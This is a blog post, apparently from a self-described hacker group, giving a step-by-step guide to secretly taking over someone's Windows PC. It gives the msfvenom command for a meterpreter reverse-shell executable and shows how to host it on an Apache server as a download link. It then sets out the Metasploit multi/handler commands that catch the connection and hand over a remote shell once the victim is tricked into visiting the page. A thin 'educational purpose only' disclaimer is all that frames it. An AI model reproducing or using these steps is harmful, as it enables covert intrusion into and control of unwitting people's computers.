Headlines
Loading...

HOW TO GAIN ACCESS TO SOMEONE'S PC OR LAPTOP WITHOUT HIM/HER EVEN KNOWING...

STEP-BY-STEP GUIDE



Note: this is for educational purpose only. Gaining access to someone PC wither there permission is a crime. You will be responsible for anything you do illegally.

For this method we will use Metasploit to create payload.

I will show you how to attack windows through kali. Just by changing commands you can hack linux also.

Step by step guide:-

Open Metasploit Framework in kali.
Now type msfvenom -p Windows/meterpreter/reverse_tcp lhost=(your ip address in kali) lport=1234 –format=exe > payload.exe
Hit enter and let the payload generate.

Here we will use apache web server to host payload and generate link.

cp payload.exe /var/www/html/ (this is where you host your website or phishing page)

service postgresql start
service apache2 start
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (your ip in kali)
set lport 1234
exploit –j –z

Show your creativity and make target visit your site by sending link which we uploaded in 5th step and when target visit this site he is actually downloading the payload in background.

Type in terminal session –i

Now you are accessing victim’s PC remotely.

Type ifconfig to see victims ip and MAC address

Now you can do anything with windows cmd commands.


HACKED….



Copyright by internationalsuperhacker and asihackergroup.

I am a new member of Google bloggers. I am interested to learning knowledge and spread/share my ideas and knowledge in over the world.

0 Comments:

Our Team

  • Muhammad Ali Master / Computers
  • Muhammad IqbalMaster / Computers
  • Shehbaz iqbalMaster / Computers
  • Zoya iqbalMaster / Computers
  • Junaid iqbalMaster / Computers
  • Shahzad IqbalMaster / Computers
  • Copyrights @ Al-Shehbaz-Iqbal-hacker-group